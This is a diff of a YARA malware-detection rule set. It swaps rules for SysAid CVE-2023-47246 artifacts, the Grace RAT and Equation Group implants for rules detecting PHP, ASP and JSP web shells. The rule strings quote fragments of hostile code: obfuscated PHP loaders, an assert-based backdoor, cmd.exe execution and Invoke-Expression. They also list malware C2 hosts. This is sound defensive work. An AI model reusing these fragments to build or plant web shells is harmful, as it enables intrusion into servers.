-		hash2 = "6d8e2d8f6aeb0f4512a53fe83b2ef7699513ebaff31735675f46d1beea3a8e05"
-		hash3 = "931cab7fbc0eb2bbc5768f8abdcc029cef76aff98540d9f5214786dccdb6a224"
-		hash4 = "969bfe42819e30e35ca601df443471d677e04c988928b63fccb25bf0531ea2cc"
-		hash5 = "db6fcd33dcb3f25890c28e47c440845b17ce2042c34ade6d6508afd461bfa21c"
-		hash6 = "ee036f333a0c4a24d9aa09848e635639e481695a9209474900eb71c9e453256b"
-		hash7 = "fa7ba459236c7b27a0429f1961b992ab87fc8b3427469fd98bfc272ae6852063"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "<html><head><title>Venus</title><style type = \"text" ascii fullword
-		$x2 = "xXBLTZKmAu9pjcfxrIK4gkDp/J9XXATjuysFRXG4rH4=" ascii fullword
-		$x3 = "%s%x%x%x%x.goodgame" wide fullword
-		$s1 = "/c ping localhost -n 3 > nul & del %s" ascii fullword
-		$s2 = "C:\\Windows\\%s.png" wide
-		$op1 = { 8b 4c 24 24 46 8b 7c 24 14 41 8b 44 24 30 81 c7 00 04 00 00 81 44 24 10 00 04 00 00 40 }
-		$op2 = { 57 c7 45 fc 00 00 00 00 7e 3f 50 33 c0 74 03 9b 6e }
-		$op3 = { 66 89 45 d4 0f 11 45 e8 e8 a8 e7 ff ff 83 c4 14 8d 45 e8 50 8d 45 a4 50 }
+		$s0 = "(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( pe.imphash ( ) == "bb2600e94092da119ee6acbbd047be43" or 1 of ( $x* ) or 2 of them ) or 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_PS1_Sysaid_EXPL_Forensicartifacts_Nov23_1 : SCRIPT CVE_2023_47246
+rule SIGNATURE_BASE_Webshell_Php_Fbi
 {
 	meta:
-		description = "Detects forensic artifacts found in attacks on SysAid on-prem software exploiting CVE-2023-47246"
-		author = "Florian Roth"
-		id = "df7997d3-9309-58b3-8cd7-de9fea36d3c7"
-		date = "2023-11-09"
-		modified = "2023-12-05"
-		reference = "https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_sysaid_cve_2023_47246.yar#L2-L15"
+		description = "Web Shell - file fbi.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L652-L665"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "85efeea88961ca99b22004726d88efc46c748273b9a0b3be674f4cbb12cd3dd1"
-		score = 85
+		hash = "1fb32f8e58c8deb168c06297a04a21f1"
+		logic_hash = "de8584ae83ee3e23f4ce00ccd73f75b4568d6a4544af45b83784a9a0c34d42e3"
+		score = 70
 		quality = 85
-		tags = "SCRIPT, CVE-2023-47246"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "if ($s -match '^(Sophos).*\\.exe\\s') {echo $s; $bp++;}" ascii wide
-		$x2 = "$s=$env:SehCore;$env:SehCore=\"\";Invoke-Expression $s;" ascii wide
+		$s7 = "erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_MAL_Loader_Turtleloader_Nov23 : CVE_2023_47246 FILE
+rule SIGNATURE_BASE_Webshell_B374Kphp_B374K
 {
 	meta:
-		description = "Detects Tutle loader used in attacks against SysAid CVE-2023-47246"
-		author = "Florian Roth"
-		id = "c7b5d03d-52c4-59b4-ac69-55e532a21340"
-		date = "2023-11-09"
-		modified = "2023-12-05"
-		reference = "https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_sysaid_cve_2023_47246.yar#L17-L38"
+		description = "Web Shell - file B374k.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L666-L682"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "14a1636ed4dc3c897fefe53946e67339f91da9e2fbed2c99b9b4119dcc2649c0"
-		score = 85
+		hash = "bed7388976f8f1d90422e8795dff1ea6"
+		logic_hash = "1f0fc5e309dd67a11d6ba9b698fd9ca3c7e6616545c220de79aaa3b63f0ad931"
+		score = 70
 		quality = 85
-		tags = "CVE-2023-47246, FILE"
-		hash1 = "b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "No key in args!" ascii fullword
-		$s2 = "Bad data file!" ascii fullword
-		$s3 = "Data file loaded. Running..." ascii
-		$op1 = { 48 8d 55 c8 4c 8d 3d ac 8f 00 00 45 33 c9 45 33 d2 4d 8b e7 44 21 0a 45 33 db 4c 8d 3d 16 ec ff ff }
-		$op2 = { 48 d3 e8 0f b6 c8 49 03 cb 49 81 c3 00 01 00 00 45 33 8c 8f a0 e4 00 00 41 83 fa 04 7c c7 41 ff c0 }
-		$op3 = { 48 83 c1 04 48 ff ca 89 41 1c 75 ef 03 f6 48 83 c3 20 48 ff cd 0f 85 77 ff ff ff }
+		$s0 = "Http://code.google.com/p/b374k-shell" fullword
+		$s1 = "$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'"
+		$s3 = "Jayalah Indonesiaku & Lyke @ 2013" fullword
+		$s4 = "B374k Vip In Beautify Just For Self" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_Grace_Dec22
+rule SIGNATURE_BASE_Webshell_Cmd_Asp_5_1
 {
 	meta:
-		description = "Detects Grace (aka FlawedGrace and GraceWire) RAT"
-		author = "X__Junior"
-		id = "fc2214dc-f1e5-52d7-a9de-88709a03b04e"
-		date = "2022-12-13"
-		modified = "2023-12-05"
-		reference = "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_sysaid_cve_2023_47246.yar#L40-L59"
+		description = "Web Shell - file cmd-asp-5.1.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L683-L696"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8276662dadfa2f8e07dd7882a60e55bd22ecf1f8f66a09940f16236598646560"
+		hash = "8baa99666bf3734cbdfdd10088e0cd9f"
+		logic_hash = "1ff4ae8c08cec4605594e97d6c077d4808d3a73c04ddf6a51952252dd2d01cf4"
 		score = 70
 		quality = 85
 		tags = ""
-		hash1 = "a66df3454b8c13f1b92d8b2cf74f5bfcdedfbff41a5e4add62e15277d14dd169"
-		hash2 = "e113a8df3c4845365f924bacf10c00bcc5e17587a204b640852dafca6db20404"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sa1 = "Grace finalized, no more library calls allowed." ascii
-		$sa2 = "Socket forcibly closed due to no response to DISCONNECT signal from other side, worker id(%d)" ascii
-		$sa3 = "AVWireCleanupThread" ascii
-		$sa4 = "AVTunnelClientDirectIO" ascii
-		$sa5 = "AVGraceTunnelWriteThread" ascii
-		$sa6 = "AVGraceTunnelClientDirectIO" ascii
+		$s9 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Apt_Equation_Exploitlib_Mutexes : FILE
+rule SIGNATURE_BASE_Webshell_Php_Dodo_Zip
 {
 	meta:
-		description = "Rule to detect Equation group's Exploitation library http://goo.gl/ivt8EW"
-		author = "Kaspersky Lab"
-		id = "d060bfd7-fb16-55d3-8a39-1197fdd8e759"
-		date = "2016-02-15"
-		modified = "2023-01-27"
-		reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L3-L20"
+		description = "Web Shell - file zip.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L697-L711"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4414dd4ca16d08b8edad26842640960ace434cdde769766fb1c38a1a249565fd"
-		score = 75
+		hash = "b7800364374077ce8864796240162ad5"
+		logic_hash = "bdeffafdedeadaba36c5c67f981c42d6111b954622780b930e9eeb9956c638b5"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		version = "1.0"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "prkMtx" wide
-		$a2 = "cnFormSyncExFBC" wide
-		$a3 = "cnFormVoidFBC" wide
-		$a4 = "cnFormSyncExFBC"
-		$a5 = "cnFormVoidFBC"
+		$s0 = "$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x"
+		$s3 = "$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of ( $a* )
+		all of them
 }
-rule SIGNATURE_BASE_Apt_Equation_Equationlaser_Runtimeclasses
+rule SIGNATURE_BASE_Webshell_Azrailphp_V1_0
 {
 	meta:
-		description = "Rule to detect the EquationLaser malware"
-		author = "Kaspersky Lab"
-		id = "924c80ca-3607-57aa-85a2-b33ff52b0c1b"
-		date = "2015-02-16"
+		description = "Web Shell - file aZRaiLPhp v1.0.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "https://securelist.com/blog/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L40-L57"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L712-L726"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "663ea56f869f7099a92658df5bddd76d4e5ba8ac5dfc693733579682b9eee860"
-		score = 75
+		hash = "26b2d3943395682e36da06ed493a3715"
+		logic_hash = "d0ccf9e37e378db4523d7918b30cff358115e7a4c36fad55a75f3aff218563c6"
+		score = 70
 		quality = 85
 		tags = ""
-		version = "1.0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "?a73957838_2@@YAXXZ"
-		$a2 = "?a84884@@YAXXZ"
-		$a3 = "?b823838_9839@@YAXXZ"
-		$a4 = "?e747383_94@@YAXXZ"
-		$a5 = "?e83834@@YAXXZ"
-		$a6 = "?e929348_827@@YAXXZ"
+		$s5 = "echo \" <font color='#0000FF'>CHMODU \".substr(base_convert(@fileperms($"
+		$s7 = "echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo"
 
 	condition:
-		any of them
+		all of them
 }
-rule SIGNATURE_BASE_Apt_Equation_Cryptotable
+rule SIGNATURE_BASE_Webshell_Php_List
 {
 	meta:
-		description = "Rule to detect the crypto library used in Equation group malware"
-		author = "Kaspersky Lab"
-		id = "e7f313a3-8ef8-5363-898a-836a96aaa2ff"
-		date = "2015-02-16"
+		description = "Web Shell - file list.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "https://securelist.com/blog/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L59-L71"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L727-L742"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e660fe423330334a1e3167d6a45e5ce2469fec276838618a7cb0340ec8172275"
-		score = 75
+		hash = "922b128ddd90e1dc2f73088956c548ed"
+		logic_hash = "007f9307493bca71dcbdcf6ba6c45bf36899e8f636ccbd09c26453cb0aea0847"
+		score = 70
 		quality = 85
 		tags = ""
-		version = "1.0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = {37 DF E8 B6 C7 9C 0B AE 91 EF F0 3B 90 C6 80 85 5D 19 4B 45 44 12 3C E2 0D 5C 1C 7B C4 FF D6 05 17 14 4F 03 74 1E 41 DA 8F 7D DE 7E 99 F1 35 AC B8 46 93 CE 23 82 07 EB 2B D4 72 71 40 F3 B0 F7 78 D7 4C D1 55 1A 39 83 18 FA E1 9A 56 B1 96 AB A6 30 C5 5F BE 0C 50 C1}
+		$s1 = "// list.php = Directory & File Listing" fullword
+		$s2 = "    echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena"
+		$s9 = "// by: The Dark Raver" fullword
 
 	condition:
-		$a
+		1 of them
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_Triplefantasy_1 : FILE
+rule SIGNATURE_BASE_Webshell_Ironshell
 {
 	meta:
-		description = "Equation Group Malware - TripleFantasy http://goo.gl/ivt8EW"
+		description = "Web Shell - file ironshell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8d2adb3c-70e0-5768-bcfa-be64220064d9"
-		date = "2015-02-16"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L75-L107"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L743-L757"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b2b2cd9ca6f5864ef2ac6382b7b6374a9fb2cbe9"
-		logic_hash = "cfa3c1756c8dfb04e0a1590f76cad6d5b3878000d220c263d199322cf6a4f58a"
-		score = 75
+		hash = "8bfa2eeb8a3ff6afc619258e39fded56"
+		logic_hash = "7e4916010a33383cfc3cbbcd5d575ac2f3a579220b66bd07e3121f3db30da66d"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "%SystemRoot%\\system32\\hnetcfg.dll" fullword wide
-		$s1 = "%WINDIR%\\System32\\ahlhcib.dll" fullword wide
-		$s2 = "%WINDIR%\\sjyntmv.dat" fullword wide
-		$s3 = "Global\\{8c38e4f3-591f-91cf-06a6-67b84d8a0102}" fullword wide
-		$s4 = "%WINDIR%\\System32\\owrwbsdi" fullword wide
-		$s5 = "Chrome" fullword wide
-		$s6 = "StringIndex" fullword ascii
-		$x1 = "itemagic.net@443" fullword wide
-		$x2 = "team4heat.net@443" fullword wide
-		$x5 = "62.216.152.69@443" fullword wide
-		$x6 = "84.233.205.37@443" fullword wide
-		$z1 = "www.microsoft.com@80" fullword wide
-		$z2 = "www.google.com@80" fullword wide
-		$z3 = "127.0.0.1:3128" fullword wide
+		$s4 = "print \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\""
+		$s8 = "print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300000 and ( ( all of ( $s* ) and all of ( $z* ) ) or ( all of ( $s* ) and 1 of ( $x* ) ) )
+		all of them
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_Doublefantasy_1 : FILE
+rule SIGNATURE_BASE_Webshell_Caidao_Shell_404
 {
 	meta:
-		description = "Equation Group Malware - DoubleFantasy"
+		description = "Web Shell - file 404.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f3c87adf-86c3-5d7c-9532-75341841869a"
-		date = "2015-02-16"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L109-L138"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L758-L771"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d09b4b6d3244ac382049736ca98d7de0c6787fa2"
-		logic_hash = "4471601300616b5442de95a3eb23c28563206f3423b57fe81007d005203a439f"
-		score = 75
+		hash = "ee94952dc53d9a29bdf4ece54c7a7aa7"
+		logic_hash = "0743d18bc5066c96cca8cc0883971d3bc876e6c2fbb996e55b6930c715e07395"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$z1 = "msvcp5%d.dll" fullword ascii
-		$s0 = "actxprxy.GetProxyDllInfo" fullword ascii
-		$s3 = "actxprxy.DllGetClassObject" fullword ascii
-		$s5 = "actxprxy.DllRegisterServer" fullword ascii
-		$s6 = "actxprxy.DllUnregisterServer" fullword ascii
-		$x2 = "191H1a1" fullword ascii
-		$x3 = "November " fullword ascii
-		$x4 = "abababababab" fullword ascii
-		$x5 = "January " fullword ascii
-		$x6 = "October " fullword ascii
-		$x7 = "September " fullword ascii
+		$s0 = "<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 350000 and ( ( $z1 ) or ( all of ( $s* ) and 6 of ( $x* ) ) )
+		all of them
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_GROK_Keylogger : FILE
+rule SIGNATURE_BASE_Webshell_ASP_Aspydrv
 {
 	meta:
-		description = "Equation Group Malware - GROK keylogger"
+		description = "Web Shell - file aspydrv.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1bae3e86-54e5-55e9-8bbd-aa9ec2a0fa2b"
-		date = "2015-02-16"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L140-L172"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L772-L785"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "50b8f125ed33233a545a1aac3c9d4bb6aa34b48f"
-		logic_hash = "502afd23b92e948a8fba33ccc4da2f4b1ec91bce5a24d153ffc545129fd8c9fa"
-		score = 75
+		hash = "de0a58f7d1e200d0b2c801a94ebce330"
+		logic_hash = "a4a6205ace49778ddc421b0f0e65c576e2ffe40ce2ab84debb939d5324420405"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "c:\\users\\rmgree5\\" ascii
-		$s1 = "msrtdv.sys" fullword wide
-		$x1 = "svrg.pdb" fullword ascii
-		$x2 = "W32pServiceTable" fullword ascii
-		$x3 = "In forma" fullword ascii
-		$x4 = "ReleaseF" fullword ascii
-		$x5 = "criptor" fullword ascii
-		$x6 = "astMutex" fullword ascii
-		$x7 = "ARASATAU" fullword ascii
-		$x8 = "R0omp4ar" fullword ascii
-		$z1 = "H.text" fullword ascii
-		$z2 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" wide
-		$z4 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\Environment" wide fullword
+		$s3 = "<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250000 and ( $s0 or ( $s1 and 6 of ( $x* ) ) or ( 6 of ( $x* ) and all of ( $z* ) ) )
+		all of them
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_Greyfishinstaller
+rule SIGNATURE_BASE_Webshell_Jsp_Web
 {
 	meta:
-		description = "Equation Group Malware - Grey Fish"
+		description = "Web Shell - file web.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ea16b51c-755e-5f08-a209-d21a1ed30fcf"
-		date = "2015-02-16"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L174-L189"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L786-L799"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "58d15d1581f32f36542f3e9fb4b1fc84d2a6ba35"
-		logic_hash = "dae6963f3210503c6c86c818a9cd6f309ba7876f14ca42966097023d474a2366"
-		score = 75
+		hash = "4bc11e28f5dccd0c45a37f2b541b2e98"
+		logic_hash = "ed0ace0ba5f8a9e763353c42e3e3a39da10596e8517aad33e5c5080b44e4d61a"
+		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "DOGROUND.exe" fullword wide
-		$s1 = "Windows Configuration Services" fullword wide
-		$s2 = "GetMappedFilenameW" fullword ascii
+		$s0 = "<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%String t=request."
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_Equationdruginstaller : FILE
+rule SIGNATURE_BASE_Webshell_Mysqlwebsh
 {
 	meta:
-		description = "Equation Group Malware - EquationDrug installer LUTEUSOBSTOS"
+		description = "Web Shell - file mysqlwebsh.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fa549e6e-f0d8-55ea-9ec9-c8ec53b55dec"
-		date = "2015-02-16"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L191-L213"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L800-L813"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "61fab1b8451275c7fd580895d9c68e152ff46417"
-		logic_hash = "815ed47a53bbc5f6c3fec3464336863028e804bde4681526ecac5de0cfff21b4"
-		score = 75
+		hash = "babfa76d11943a22484b3837f105fada"
+		logic_hash = "365d19c086b3bbb98cbe1e1ed1e7522ce98dc2614a39c747717c277cebef33d2"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\\system32\\win32k.sys" wide
-		$s1 = "ALL_FIREWALLS" fullword ascii
-		$x1 = "@prkMtx" fullword wide
-		$x2 = "STATIC" fullword wide
-		$x3 = "windir" fullword wide
-		$x4 = "cnFormVoidFBC" fullword wide
-		$x5 = "CcnFormSyncExFBC" fullword wide
-		$x6 = "WinStaObj" fullword wide
-		$x7 = "BINRES" fullword wide
+		$s3 = " <TR><TD bgcolor=\"<? echo (!$CONNECT && $action == \"chparam\")?\"#660000\":\"#"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500000 and all of ( $s* ) and 5 of ( $x* )
+		all of them
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_Equationlaserinstaller : FILE
+rule SIGNATURE_BASE_Webshell_Jspshell
 {
 	meta:
-		description = "Equation Group Malware - EquationLaser Installer"
+		description = "Web Shell - file jspShell.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "15fd5668-36f2-556c-8150-225d3cbd4121"
-		date = "2015-02-16"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L215-L236"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L814-L828"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5e1f56c1e57fbff96d4999db1fd6dd0f7d8221df"
-		logic_hash = "6f8ba26f5efaa7ec422171862e1b645472387395f0be3a4625d58de5f0584c0b"
-		score = 80
+		hash = "0d5b5a17552254be6c1c8f1eb3a5fdc1"
+		logic_hash = "058ddd64b142cada7144b9befa81ada314b72e6f23524d98efcb10136c23ed33"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Failed to get Windows version" fullword ascii
-		$s1 = "lsasrv32.dll and lsass.exe" fullword wide
-		$s2 = "\\\\%s\\mailslot\\%s" fullword ascii
-		$s3 = "%d-%d-%d %d:%d:%d Z" fullword ascii
-		$s4 = "lsasrv32.dll" fullword ascii
-		$s6 = "%s %02x %s" fullword ascii
-		$s7 = "VIEWERS" fullword ascii
-		$s8 = "5.2.3790.220 (srv03_gdr.040918-1552)" fullword wide
+		$s0 = "<input type=\"checkbox\" name=\"autoUpdate\" value=\"AutoUpdate\" on"
+		$s1 = "onblur=\"document.shell.autoUpdate.checked= this.oldValue;"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d ) and filesize < 250000 and 6 of ( $s* )
+		all of them
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_Fannyworm : FILE
+rule SIGNATURE_BASE_Webshell_Dx_Dx
 {
 	meta:
-		description = "Equation Group Malware - Fanny Worm"
+		description = "Web Shell - file Dx.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1b8d1ce6-8926-5aa3-8fba-6a8451d66a7d"
-		date = "2015-02-16"
-		modified = "2023-01-06"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L238-L277"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
